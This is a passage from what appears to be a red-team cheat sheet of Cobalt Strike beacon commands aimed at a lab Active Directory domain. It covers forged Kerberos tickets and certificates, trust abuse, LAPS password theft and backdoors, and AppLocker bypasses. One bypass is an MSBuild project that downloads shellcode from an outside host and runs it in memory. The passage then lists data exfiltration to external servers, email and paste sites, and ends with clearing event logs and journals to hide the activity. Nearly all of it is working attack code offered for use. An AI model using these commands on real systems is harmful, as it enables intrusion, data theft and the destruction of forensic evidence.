beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe diamond /tgtdeleg /ticketuser:nlamb /ticketuserid:1106 /groups:512 /krbkey:<krbtgt-aes256> /nowrap

# 3. Compare diamond vs golden ticket properties
PS C:\Users\Attacker> C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe describe /ticket:doIFYj[...snip...]MuSU8=

Forged Certificates

Usage: Create malicious certificates using stolen CA private keys.

# 1. Extract CA private key and certificate (execute on DC/CA)
beacon> execute-assembly C:\Tools\SharpDPAPI\SharpDPAPI\bin\Release\SharpDPAPI.exe certificates /machine

# 2. Convert certificate to PFX format
ubuntu@DESKTOP-3BSK7NO ~> openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

# 3. Forge certificate for target user
PS C:\Users\Attacker> C:\Tools\ForgeCert\ForgeCert\bin\Release\ForgeCert.exe --CaCertPath .\Desktop\sub-ca.pfx --CaCertPassword pass123 --Subject "CN=User" --SubjectAltName "nlamb@cyberbotic.io" --NewCertPath .\Desktop\fake.pfx --NewCertPassword pass123

# 4. Encode forged certificate
ubuntu@DESKTOP-3BSK7NO ~> cat cert.pfx | base64 -w 0

# 5. Request TGT using forged certificate
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:nlamb /domain:dev.cyberbotic.io /enctype:aes256 /certificate:MIACAQ[...snip...]IEAAAA /password:pass123 /nowrap

# 6. Access resources
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:DEV /username:nlamb /password:FakePass /ticket:doIFLz[...snip...]MuaW8=

beacon> steal_token 5060
beacon> run klist
beacon> ls \\dc-2.dev.cyberbotic.io\c$

---

Forest & Domain Trusts

Trust Enumeration

Usage: Discover trust relationships between domains.

# Enumerate domain trusts (use -Domain for specific domains)
beacon> powerpick Get-DomainTrust

Child to Parent Domain Privilege Escalation

Usage: Escalate from child domain to parent domain using SID history.

# 1. Gather required information
beacon> powerpick Get-DomainGroup -Identity "Domain Admins" -Domain cyberbotic.io -Properties ObjectSid
beacon> powerpick Get-DomainController -Domain cyberbotic.io | select Name
beacon> powerpick Get-DomainGroupMember -Identity "Domain Admins" -Domain cyberbotic.io | select MemberName

# 2. Option A: Golden ticket with SID history injection
PS C:\Users\Attacker> C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe golden /aes256:<aes256> /user:Administrator /domain:dev.cyberbotic.io /sid:S-1-5-21-569305411-121244042-2357301523 /sids:S-1-5-21-2594061375-675613155-814674916-512 /nowrap

# 2. Option B: Diamond ticket with SID history
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe diamond /tgtdeleg /ticketuser:Administrator /ticketuserid:500 /groups:519 /sids:S-1-5-21-2594061375-675613155-814674916-519 /krbkey:<krbtgt-aes256> /nowrap

# 3. Access parent domain resources
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:DEV /username:nlamb /password:FakePass /ticket:doIFLz[...snip...]MuaW8=

beacon> steal_token 5060
beacon> run klist
beacon> ls \\dc-1.cyberbotic.io\c$
beacon> jump psexec64 dc-1.cyberbotic.io PeerSambhar
beacon> dcsync cyberbotic.io cyber\krbtgt

Exploiting Inbound Trusts

Usage: Abuse inbound trusts where foreign domain users have privileges in our domain.

# 1. Enumerate trust relationships
beacon> powerpick Get-DomainTrust
beacon> powerpick Get-DomainComputer -Domain dev-studio.com -Properties DnsHostName

# 2. Find foreign users with local privileges
beacon> powerpick Get-DomainForeignGroupMember -Domain dev-studio.com
beacon> powerpick ConvertFrom-SID S-1-5-21-569305411-121244042-2357301523-1120
beacon> powerpick Get-DomainGroupMember -Identity "Studio Admins" | select MemberName
beacon> powerpick Get-DomainController -Domain dev-studio.com | select Name

# 3. Extract user credentials
beacon> dcsync dev.cyberbotic.io dev\nlamb

# 4. Request inter-realm TGT
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:nlamb /domain:dev.cyberbotic.io /aes256:<aes256> /nowrap

# 5. Request referral ticket to foreign domain
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgs /service:krbtgt/dev-studio.com /domain:dev.cyberbotic.io /dc:dc-2.dev.cyberbotic.io /ticket:doIFwj[...]MuaW8= /nowrap

# 6. Request service ticket in foreign domain
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgs /service:cifs/dc.dev-studio.com /domain:dev-studio.com /dc:dc.dev-studio.com /ticket:doIFoz[...]NPTQ== /nowrap

# 7. Access foreign domain resources
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:DEV /username:nlamb /password:FakePass /ticket:doIFLz[...snip...]MuaW8=

beacon> steal_token 5060
beacon> run klist
beacon> ls \\dc.dev-studio.com\c$

Exploiting Outbound Trusts

Usage: Abuse outbound trusts by extracting shared trust keys.

# 1. Enumerate outbound trusts
beacon> powerpick Get-DomainTrust -Domain cyberbotic.io

# 2. Identify trusted domain objects (TDO)
beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(objectCategory=trustedDomain)" --domain cyberbotic.io --attributes distinguishedName,name,flatName,trustDirection

# 3. Extract trust key from DC
beacon> run hostname 
beacon> mimikatz lsadump::trust /patch

# Alternative: Remote DCSync for trust key
beacon> powerpick Get-DomainObject -Identity "CN=msp.org,CN=System,DC=cyberbotic,DC=io" | select objectGuid
beacon> mimikatz @lsadump::dcsync /domain:cyberbotic.io /guid:{b93d2e36-48df-46bf-89d5-2fc22c139b43}

# 4. Enumerate foreign domain structure
beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(objectCategory=user)"

# 5. Impersonate trust account in foreign domain
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:CYBER$ /domain:msp.org /rc4:f3fc2312d9d1f80b78e67d55d41ad496 /nowrap

# 6. Access foreign domain
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:MSP /username:CYBER$ /password:FakePass /ticket:doIFLz[...snip...]MuaW8=

beacon> steal_token 5060
beacon> run klist
beacon> powerpick Get-Domain -Domain msp.org

---

LAPS

LAPS Detection

Usage: Identify Local Administrator Password Solution deployment.

# Check for LAPS client installation
beacon> ls C:\Program Files\LAPS\CSE

# Find computers with LAPS attributes
powerpick Get-DomainComputer | ? { $_."ms-Mcs-AdmPwdExpirationTime" -ne $null } | select dnsHostName

# Identify LAPS GPO configuration
beacon> powerpick Get-DomainGPO | ? { $_.DisplayName -like "*laps*" } | select DisplayName, Name, GPCFileSysPath | fl

LAPS Configuration Analysis

Usage: Download and analyze LAPS policy settings.

# Download LAPS policy files
beacon> ls \\dev.cyberbotic.io\SysVol\dev.cyberbotic.io\Policies\{2BE4337D-D231-4D23-A029-7B999885E659}\Machine
beacon> download \\dev.cyberbotic.io\SysVol\dev.cyberbotic.io\Policies\{2BE4337D-D231-4D23-A029-7B999885E659}\Machine\Registry.pol

# Parse policy file
PS C:\Users\Attacker> Parse-PolFile .\Desktop\Registry.pol

LAPS Password Access

Usage: Identify who can read LAPS passwords and extract them.

# Find principals with LAPS read permissions
beacon> powerpick Get-DomainComputer | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ObjectAceType -eq "ms-Mcs-AdmPwd" -and $_.ActiveDirectoryRights -match "ReadProperty" } | select ObjectDn, SecurityIdentifier
beacon> powershell ConvertFrom-SID S-1-5-21-569305411-121244042-2357301523-1107

# Use LAPS Toolkit for enumeration
beacon> powershell-import C:\Tools\LAPSToolkit\LAPSToolkit.ps1
beacon> powerpick Find-LAPSDelegatedGroups
beacon> powerpick Find-AdmPwdExtendedRights

# Extract LAPS passwords (requires appropriate permissions)
beacon> powerpick Get-DomainComputer -Identity wkstn-1 -Properties ms-Mcs-AdmPwd
beacon> powerpick Get-DomainComputer -Identity wkstn-1 -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime

# Use extracted credentials
beacon> make_token .\LapsAdmin 1N3FyjJR5L18za
beacon> ls \\wkstn-1\c$

LAPS Persistence and Backdoors

Usage: Maintain access despite LAPS password rotation.

# Set far future expiry date (requires machine context)
beacon> powerpick Set-DomainObject -Identity wkstn-1 -Set @{'ms-Mcs-AdmPwdExpirationTime' = '136257686710000000'} -Verbose

# LAPS DLL Backdoor
# Modify AdmPwd.PS.dll and AdmPwd.Utils.dll in:
# C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AdmPwd.PS\
# to log passwords when viewed by administrators

---

AppLocker

AppLocker Policy Enumeration

Usage: Discover AppLocker restrictions and find bypass opportunities.

# Enumerate AppLocker policy via GPO
beacon> powershell Get-DomainGPO -Domain dev-studio.com | ? { $_.DisplayName -like "*AppLocker*" } | select displayname, gpcfilesyspath
beacon> download \\dev-studio.com\SysVol\dev-studio.com\Policies\{7E1E1636-1A59-4C35-895B-3AEB1CA8CFC2}\Machine\Registry.pol

# Parse policy file
PS C:\Users\Attacker> Parse-PolFile .\Desktop\Registry.pol

# Check local AppLocker policy
PS C:\Users\Administrator> Get-ChildItem "HKLM:Software\Policies\Microsoft\Windows\SrpV2"
PS C:\Users\Administrator> Get-ChildItem "HKLM:Software\Policies\Microsoft\Windows\SrpV2\Exe"

# Check PowerShell execution policy
PS C:\Users\Administrator> $ExecutionContext.SessionState.LanguageMode

AppLocker Bypass Techniques

Writable Windows Directories

Usage: Find writable locations within allowed paths.

# Find writable directories in Windows folder
beacon> powershell Get-Acl C:\Windows\Tasks | fl

# Note: PSExec works because service binaries are placed in C:\Windows (whitelisted by default)

LOLBAS - MSBuild

Usage: Use MSBuild to execute C# code bypassing AppLocker.

<!-- Save as test.csproj and execute with MSBuild -->
<!-- Host http_x64.xprocess.bin via Site Management > Host File -->
<!-- Execute: C:\Windows\Microsoft.Net\Framework64\v4.0.30319\MSBuild.exe test.csproj -->

<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <Target Name="MSBuild">
   <MSBuildTest/>
  </Target>
   <UsingTask
    TaskName="MSBuildTest"
    TaskFactory="CodeTaskFactory"
    AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
     <Task>
      <Code Type="Class" Language="cs">
        <![CDATA[
            using System;
            using System.Net;
            using System.Runtime.InteropServices;
            using Microsoft.Build.Framework;
            using Microsoft.Build.Utilities;

            public class MSBuildTest :  Task, ITask
            {
                public override bool Execute()
                {
                    byte[] shellcode;
                    using (var client = new WebClient())
                    {
                        client.BaseAddress = "http://nickelviper.com";
                        shellcode = client.DownloadData("beacon.bin");
                    }
      
                    var hKernel = LoadLibrary("kernel32.dll");
                    var hVa = GetProcAddress(hKernel, "VirtualAlloc");
                    var hCt = GetProcAddress(hKernel, "CreateThread");

                    var va = Marshal.GetDelegateForFunctionPointer<AllocateVirtualMemory>(hVa);
                    var ct = Marshal.GetDelegateForFunctionPointer<CreateThread>(hCt);

                    var hMemory = va(IntPtr.Zero, (uint)shellcode.Length, 0x00001000 | 0x00002000, 0x40);
                    Marshal.Copy(shellcode, 0, hMemory, shellcode.Length);

                    var t = ct(IntPtr.Zero, 0, hMemory, IntPtr.Zero, 0, IntPtr.Zero);
                    WaitForSingleObject(t, 0xFFFFFFFF);

                    return true;
                }

            [DllImport("kernel32", CharSet = CharSet.Ansi)]
            private static extern IntPtr LoadLibrary([MarshalAs(UnmanagedType.LPStr)]string lpFileName);
    
            [DllImport("kernel32", CharSet = CharSet.Ansi)]
            private static extern IntPtr GetProcAddress(IntPtr hModule, string procName);

            [DllImport("kernel32")]
            private static extern uint WaitForSingleObject(IntPtr hHandle, uint dwMilliseconds);

            [UnmanagedFunctionPointer(CallingConvention.StdCall)]
            private delegate IntPtr AllocateVirtualMemory(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
    
            [UnmanagedFunctionPointer(CallingConvention.StdCall)]
            private delegate IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
            }
        ]]>
      </Code>
    </Task>
  </UsingTask>
</Project>

PowerShell Constrained Language Mode Bypass

Usage: Break out of PowerShell restrictions using unmanaged runspaces.

# Check current language mode
beacon> powershell $ExecutionContext.SessionState.LanguageMode
ConstrainedLanguage

# Use powerpick for full language mode
beacon> powerpick $ExecutionContext.SessionState.LanguageMode
FullLanguage

DLL Execution

Usage: Execute beacon DLLs (typically not restricted by AppLocker).

# Execute beacon DLL using rundll32
C:\Windows\System32\rundll32.exe http_x64.dll,StartW

---

Data Exfiltration

Network Share Enumeration

Usage: Discover and access network file shares containing sensitive data.

# General share discovery
beacon> powerpick Invoke-ShareFinder
beacon> powerpick Invoke-FileFinder
beacon> powerpick Get-FileNetServer

# Search for Group Policy passwords in SYSVOL
beacon> shell findstr /S /I cpassword \\dc.organicsecurity.local\sysvol\organicsecurity.local\policies\*.xml
beacon> Get-DecryptedCpassword

# Find accessible shares with sensitive files
beacon> powerpick Find-DomainShare -CheckShareAccess
beacon> powerpick Find-InterestingDomainShareFile -Include *.doc*, *.xls*, *.csv, *.ppt*

# Preview file contents
beacon> powerpick gc \\fs.dev.cyberbotic.io\finance$\export.csv | select -first 5

Database Data Discovery

Usage: Search for sensitive information in accessible databases.

# Search for sensitive keywords in accessible databases
beacon> powerpick Get-SQLInstanceDomain | Get-SQLConnectionTest | ? { $_.Status -eq "Accessible" } | Get-SQLColumnSampleDataThreaded -Keywords "email,address,credit,card" -SampleSize 5 | select instance, database, column, sample | ft -autosize

# Database link enumeration and data extraction
beacon> powerpick Get-SQLQuery -Instance "sql-2.dev.cyberbotic.io,1433" -Query "select * from openquery(""sql-1.cyberbotic.io"", 'select * from information_schema.tables')"

beacon> powerpick Get-SQLQuery -Instance "sql-2.dev.cyberbotic.io,1433" -Query "select * from openquery(""sql-1.cyberbotic.io"", 'select column_name from master.information_schema.columns where table_name=''employees''')"

beacon> powerpick Get-SQLQuery -Instance "sql-2.dev.cyberbotic.io,1433" -Query "select * from openquery(""sql-1.cyberbotic.io"", 'select top 5 first_name,gender,sort_code from master.dbo.employees')"

File System Search Techniques

Usage: Search for sensitive files across the network.

# Search for specific file types
beacon> powerpick Get-ChildItem -Path "\\server\share" -Recurse -Include *.xlsx,*.docx,*.pdf | select FullName,Length,LastWriteTime

# Search file contents for keywords
beacon> powerpick Select-String -Path "\\server\share\*.txt" -Pattern "password|credential|secret" | select Filename,LineNumber,Line

# Search registry for stored credentials
beacon> powerpick Get-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" | select DefaultUserName,DefaultPassword

# Search for files containing sensitive patterns
beacon> powerpick Get-ChildItem -Path "C:\Users" -Recurse -Include *.txt,*.doc*,*.xls* | Select-String -Pattern "password|ssn|social.*security|credit.*card" | select Filename,LineNumber

# Search browser saved passwords and bookmarks
beacon> powerpick Get-ChildItem -Path "$env:APPDATA\Microsoft\Windows\Cookies" -Recurse
beacon> powerpick Get-Content -Path "$env:APPDATA\Mozilla\Firefox\Profiles\*.default\places.sqlite"

Data Staging and Compression

Usage: Prepare data for exfiltration while minimizing detection.

# Create staging directory in system location
beacon> mkdir C:\Windows\Temp\Updates

# Compress data for exfiltration
beacon> powerpick Compress-Archive -Path "\\server\share\sensitive_folder" -DestinationPath "C:\Windows\Temp\Updates\data.zip" -CompressionLevel Optimal

# Alternative compression using 7zip (if available)
beacon> shell "C:\Program Files\7-Zip\7z.exe" a -tzip "C:\Windows\Temp\Updates\archive.zip" "\\server\share\*" -mx9

# WinRAR compression (if available)
beacon> shell "C:\Program Files\WinRAR\rar.exe" a -r -ep1 "C:\Windows\Temp\Updates\data.rar" "\\server\share\*"

# Built-in compression using makecab
beacon> shell makecab "C:\sensitive\file.txt" "C:\Windows\Temp\Updates\file.cab"

# Base64 encode small files for easy transfer
beacon> powerpick [System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes("C:\sensitive\file.txt")) | Out-File "C:\Windows\Temp\encoded.txt"

# Split large files for easier exfiltration
beacon> powerpick $inputFile = "C:\Windows\Temp\Updates\data.zip"; $chunkSize = 10MB; $chunks = [Math]::Ceiling((Get-Item $inputFile).Length / $chunkSize); 1..$chunks | ForEach-Object { $start = ($_ - 1) * $chunkSize; $end = [Math]::Min($start + $chunkSize - 1, (Get-Item $inputFile).Length - 1); $bytes = [System.IO.File]::ReadAllBytes($inputFile)[$start..$end]; [System.IO.File]::WriteAllBytes("$inputFile.part$_", $bytes) }

Exfiltration Methods

Usage: Transfer data out of the network using various techniques.

# HTTP POST exfiltration
beacon> powerpick Invoke-WebRequest -Uri "http://exfil-server.com/upload" -Method POST -InFile "C:\Windows\Temp\Updates\data.zip" -Headers @{"User-Agent"="Mozilla/5.0"}

# HTTP PUT exfiltration
beacon> powerpick Invoke-RestMethod -Uri "http://exfil-server.com/put/data.zip" -Method PUT -InFile "C:\Windows\Temp\Updates\data.zip"

# FTP exfiltration
beacon> powerpick $webclient = New-Object System.Net.WebClient; $webclient.Credentials = New-Object System.Net.NetworkCredential("username","password"); $webclient.UploadFile("ftp://ftp.exfil-server.com/data.zip", "C:\Windows\Temp\Updates\data.zip")

# FTPS exfiltration using WinSCP (if available)
beacon> shell "C:\Program Files\WinSCP\WinSCP.exe" /command "open ftps://user:pass@server.com" "put C:\Windows\Temp\Updates\data.zip" "exit"

# DNS exfiltration (for small amounts of data)
beacon> powerpick $data = [System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes("C:\small_file.txt")); $data -split '(.{63})' | Where-Object {$_} | ForEach-Object { nslookup "$_.exfil.domain.com" }

# ICMP exfiltration using ping with data
beacon> powerpick $data = [System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes("C:\small_file.txt")); ping -n 1 -l 1024 "exfil-server.com" -w 1000

# Email exfiltration
beacon> powerpick Send-MailMessage -From "user@company.com" -To "attacker@external.com" -Subject "Quarterly Report" -Body "Please find attached report" -Attachments "C:\Windows\Temp\Updates\data.zip" -SmtpServer "mail.company.com" -Port 587 -UseSsl

# Cloud storage upload using legitimate tools
beacon> powerpick Start-Process -FilePath "C:\Users\$env:USERNAME\AppData\Local\Dropbox\Update\DropboxUpdate.exe" -ArgumentList "/upload C:\Windows\Temp\Updates\data.zip" -WindowStyle Hidden

# Google Drive upload (if Google Drive installed)
beacon> shell copy "C:\Windows\Temp\Updates\data.zip" "C:\Users\$env:USERNAME\Google Drive\data.zip"

# OneDrive upload
beacon> shell copy "C:\Windows\Temp\Updates\data.zip" "C:\Users\$env:USERNAME\OneDrive\data.zip"

# Pastebin exfiltration for small text data
beacon> powerpick $content = Get-Content "C:\sensitive\passwords.txt" -Raw; Invoke-WebRequest -Uri "https://pastebin.com/api/api_post.php" -Method POST -Body @{api_dev_key="your_key";api_option="paste";api_paste_code=$content}

# GitHub Gist exfiltration
beacon> powerpick $headers = @{Authorization="token your_github_token"}; $body = @{files=@{"data.txt"=@{content=(Get-Content "C:\sensitive\file.txt" -Raw)}}} | ConvertTo-Json -Depth 3; Invoke-WebRequest -Uri "https://api.github.com/gists" -Method POST -Headers $headers -Body $body

Steganography and Covert Channels

Usage: Hide data in legitimate-looking files and communications.

# Hide data in image files using built-in tools
beacon> shell copy /b "C:\legitimate_image.jpg" + "C:\sensitive_data.txt" "C:\Windows\Temp\combined.jpg"

# Extract hidden data
beacon> shell findstr /v /c:"" "C:\Windows\Temp\combined.jpg" > "C:\Windows\Temp\extracted.txt"

# Hide data in Word document properties
beacon> powerpick $word = New-Object -ComObject Word.Application; $doc = $word.Documents.Open("C:\document.docx"); $doc.BuiltInDocumentProperties.Item("Comments") = [System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes("C:\sensitive.txt")); $doc.Save(); $word.Quit()

# Covert timing channel using sleep intervals
beacon> powerpick $data = [System.IO.File]::ReadAllBytes("C:\sensitive.txt"); foreach($byte in $data) { Start-Sleep -Milliseconds ($byte * 10); ping -n 1 exfil-server.com }

Living off the Land Exfiltration

Usage: Use legitimate Windows utilities for data exfiltration.

# Using certutil for base64 encoding and web requests
beacon> shell certutil -encode "C:\sensitive\data.txt" "C:\Windows\Temp\encoded.txt"
beacon> shell certutil -urlcache -split -f "http://exfil-server.com/upload" "C:\Windows\Temp\test.html"

# Using bitsadmin for file transfer
beacon> shell bitsadmin /create /download mydownloadjob
beacon> shell bitsadmin /addfile mydownloadjob "http://exfil-server.com/upload.php" "C:\Windows\Temp\null"
beacon> shell bitsadmin /SetNotifyCmdLine mydownloadjob "C:\Windows\Temp\data.zip" NULL
beacon> shell bitsadmin /resume mydownloadjob

# Using PowerShell WebClient
beacon> powerpick $client = New-Object System.Net.WebClient; $client.UploadFile("http://exfil-server.com/upload.php", "POST", "C:\Windows\Temp\data.zip")

# Using curl (Windows 10 version 1803+)
beacon> shell curl -X POST -F "file=@C:\Windows\Temp\data.zip" http://exfil-server.com/upload

# Using tar (Windows 10+) for compression
beacon> shell tar -czf "C:\Windows\Temp\archive.tar.gz" "C:\sensitive\folder\*"

Registry Exfiltration

Usage: Extract sensitive information from Windows registry.

# Export registry hives
beacon> shell reg export HKLM\SAM "C:\Windows\Temp\sam.reg" /y
beacon> shell reg export HKLM\SYSTEM "C:\Windows\Temp\system.reg" /y
beacon> shell reg export HKLM\SECURITY "C:\Windows\Temp\security.reg" /y

# Export user registry hives
beacon> shell reg export HKCU "C:\Windows\Temp\user.reg" /y
beacon> shell reg export HKU "C:\Windows\Temp\users.reg" /y

# Search for stored credentials in registry
beacon> powerpick Get-ChildItem -Path "HKLM:\SOFTWARE" -Recurse | Get-ItemProperty | Where-Object {$_.PSObject.Properties.Name -match "password|pwd|credential|secret"}

# Export browser saved passwords from registry
beacon> shell reg export "HKCU\Software\Microsoft\Internet Explorer\IntelliForms\Storage2" "C:\Windows\Temp\ie_passwords.reg" /y

Covering Tracks

Usage: Remove evidence of data access and exfiltration.

# Clear PowerShell history
beacon> powerpick Remove-Item (Get-PSReadlineOption).HistorySavePath -Force -ErrorAction SilentlyContinue
beacon> powerpick Clear-History
beacon> powerpick Remove-Item "$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" -Force -ErrorAction SilentlyContinue

# Clear Windows event logs
beacon> powerpick wevtutil cl System
beacon> powerpick wevtutil cl Security  
beacon> powerpick wevtutil cl Application
beacon> powerpick wevtutil cl "Microsoft-Windows-PowerShell/Operational"
beacon> powerpick wevtutil cl "Windows PowerShell"

# Clear specific event IDs related to file access
beacon> powerpick Get-WinEvent -FilterHashtable @{LogName="Security";ID=4663,4656,4658} | Where-Object {$_.Message -like "*sensitive*"} | ForEach-Object {wevtutil delete-log Security /q:$_.RecordId}

# Remove staging files securely
beacon> shell sdelete -p 3 -s -z "C:\Windows\Temp\Updates"
beacon> rmdir "C:\Windows\Temp\Updates"

# Clear prefetch files
beacon> shell del /f /q "C:\Windows\Prefetch\*.pf"

# Clear file access timestamps
beacon> powerpick Get-ChildItem "\\server\share" -Recurse | ForEach-Object {$_.LastAccessTime = $_.CreationTime}

# Clear USN journal entries (requires admin)
beacon> shell fsutil usn deletejournal /d C:

# Clear browser history and cache  
beacon> powerpick Remove-Item -Path "$env:LOCALAPPDATA\Microsoft\Windows\WebCache\*" -Force -Recurse -ErrorAction SilentlyContinue
beacon> powerpick Remove-Item -Path "$env:APPDATA\Microsoft\Windows\Recent\*" -Force -ErrorAction SilentlyContinue
beacon> powerpick Remove-Item -Path "$env:LOCALAPPDATA\Microsoft\Windows\History\*" -Force -Recurse -ErrorAction SilentlyContinue

# Clear Chrome history
beacon> powerpick Remove-Item -Path "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\History" -Force -ErrorAction SilentlyContinue
beacon> powerpick Remove-Item -Path "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\History*" -Force -ErrorAction SilentlyContinue

# Clear Firefox history
beacon> powerpick Get-ChildItem "$env:APPDATA\Mozilla\Firefox\Profiles\*.default" | ForEach-Object { Remove-Item "$($_.FullName)\places.sqlite" -Force -ErrorAction SilentlyContinue }

# Clear thumbnail cache
beacon> powerpick Remove-Item -Path "$env:LOCALAPPDATA\Microsoft\Windows\Explorer\thumbcache*.db" -Force -ErrorAction SilentlyContinue

# Clear Windows Search index
beacon> shell sc stop "WSearch"
beacon> powerpick Remove-Item -Path "C:\ProgramData\Microsoft\Search\Data\*" -Force -Recurse -ErrorAction SilentlyContinue
beacon> shell sc start "WSearch"

# Overwrite slack space (requires admin)
beacon> shell cipher /w:C:\Windows\Temp

# Clear network connection history
beacon> shell netsh interface ip delete arpcache
beacon> shell route delete 0.0.0.0

# Clear DNS cache
beacon> shell ipconfig /flushdns

---